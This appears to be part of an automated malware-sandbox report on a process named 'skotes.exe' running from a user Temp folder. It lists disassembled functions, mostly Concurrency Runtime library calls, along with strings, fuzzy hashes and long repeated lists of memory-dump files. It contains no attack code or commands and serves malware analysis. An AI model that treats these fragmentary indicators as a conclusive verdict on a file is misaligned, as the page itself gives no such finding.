Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 9e7bb0c97684c884fecf280c53afc414ff34e2ec390a1962d7cf51238d2b874f
Instruction ID: a3cf5c48972740b9e799b118efbbea5aa1ade33d893cd189e1d4bc3394aeb7a1
Opcode Fuzzy Hash: 9e7bb0c97684c884fecf280c53afc414ff34e2ec390a1962d7cf51238d2b874f
Instruction Fuzzy Hash: DE21F735B00616DBCB15AB68D89DABC73A5BF94334B48452AEC03872D1CFACAC45CBD0

Function 0076DFE3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85COMMON

Download Yara Rule

Strings

6v, xrefs: 0076E034
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 0076DFE8

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID:
String ID: 6v$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
API String ID: 0-1079527470
Opcode ID: c6be5c50584d657707df42b062e0369ac4fafe858f015f93482fc6c9372e767a
Instruction ID: ad280693ec0af38b4d98c674bfe2274e33010ad7ae95123a1e0c167ea84e170f
Opcode Fuzzy Hash: c6be5c50584d657707df42b062e0369ac4fafe858f015f93482fc6c9372e767a
Instruction Fuzzy Hash: 6521D175614209BFDB30AE688C81E6B73ADEF003A87204614FD2B97582EB68EC508770

Function 0075AE65 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 0075AEEA
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0075AF0F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0075AF4E

Strings

pExecutionResource, xrefs: 0075AF07

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: ba88c0c33fe8839cc59c6089f181d98f8bff4f9348efbbd0019a0b2b9133b4d0
Instruction ID: 0849d570969cbe861463e6173e4f26918a035ce56959443d23d20498f2e35f96
Opcode Fuzzy Hash: ba88c0c33fe8839cc59c6089f181d98f8bff4f9348efbbd0019a0b2b9133b4d0
Instruction Fuzzy Hash: 7921D8B5640205EFCF18EF64C856BADB7B5BF48310F104029E905AB282DBBCAE05CB91

Function 00754EA2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00754F24
Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00754F66

Strings

count, xrefs: 00754EBA
ppVirtualProcessorRoots, xrefs: 00754F1C

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
String ID: count$ppVirtualProcessorRoots
API String ID: 2663199487-3650809737
Opcode ID: cb9fbfd3bd87c4bde76c51ae1b1fe865977781d3530473222ffd03b5fb567f76
Instruction ID: b99a9e59380a98f5e01ebba3ba545a7c7fdb5049675cab832ce7cd8a3072d2cd
Opcode Fuzzy Hash: cb9fbfd3bd87c4bde76c51ae1b1fe865977781d3530473222ffd03b5fb567f76
Instruction Fuzzy Hash: 98213434600204EFCB14EFA8C886EAD73B5FF48315F004029F9069B292DBB9AE05CF90

Function 0075B975 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0075BA0E

Strings

RoUninitialize, xrefs: 0075B9C1
RoInitialize, xrefs: 0075B998
combase.dll, xrefs: 0075B983, 0075B988, 0075B99D, 0075B9C8

Memory Dump Source

Source File: 00000005.00000002.3473950586.0000000000731000.00000040.00000001.01000000.00000007.sdmp, Offset: 00730000, based on PE: true

Associated: 00000005.00000002.3473154539.0000000000730000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3473950586.0000000000792000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474201913.0000000000799000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474332079.000000000079B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474429658.00000000007A5000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474528249.00000000007A6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3474596160.00000000007A7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475275771.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475318569.0000000000908000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475395460.000000000092C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475563362.0000000000930000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475636798.0000000000935000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475700772.0000000000936000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475743020.0000000000937000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475820909.0000000000947000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475882530.0000000000949000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3475992597.000000000095E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476108726.0000000000961000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476181390.0000000000969000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476287357.0000000000972000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476372468.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476454798.000000000098F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476513441.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476567837.0000000000998000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476617765.0000000000999000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476674254.000000000099E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476734400.00000000009AE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3476843662.00000000009B3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477035167.00000000009B4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477127645.00000000009BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477187588.00000000009C2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477269013.00000000009C5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477304067.00000000009C6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477361570.00000000009CD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477423643.00000000009E2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.00000000009E6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477481567.0000000000A0E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477747463.0000000000A25000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477902082.0000000000A26000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3477995633.0000000000A3E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478381117.0000000000A3F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478819439.0000000000A40000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478925060.0000000000A44000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3478997416.0000000000A46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479057814.0000000000A55000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.3479091911.0000000000A56000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_730000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
String ID: RoInitialize$RoUninitialize$combase.dll
API String ID: 348560076-3997890769
Opcode ID: 818f44e9b81784e417872559c1348963a792d7bea5984ea5f331b525ecc5c1c1
Instruction ID: 15af12d71b725eb24982076dbeda7dc82f38bd389ec44fa0d4f57e509390eb8c
Opcode Fuzzy Hash: 818f44e9b81784e417872559c1348963a792d7bea5984ea5f331b525ecc5c1c1
Instruction Fuzzy Hash: A10192B06813159EEB12B7755C06AFB329C9F01359F205429AD40E61C1EFEDE80547B5

Function 00756E1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SafeRWList.LIBCONCRT ref: 00756E73

Part of subcall function 00754E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00754E7F
Part of subcall function 00754E6E: List.LIBCMT ref: 00754E89

std::invalid_argument::invalid_argument.LIBCONCRT ref: 00756E85
Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00756EAA

Strings

eventObject, xrefs: 00756E7D

Memory Dump Source

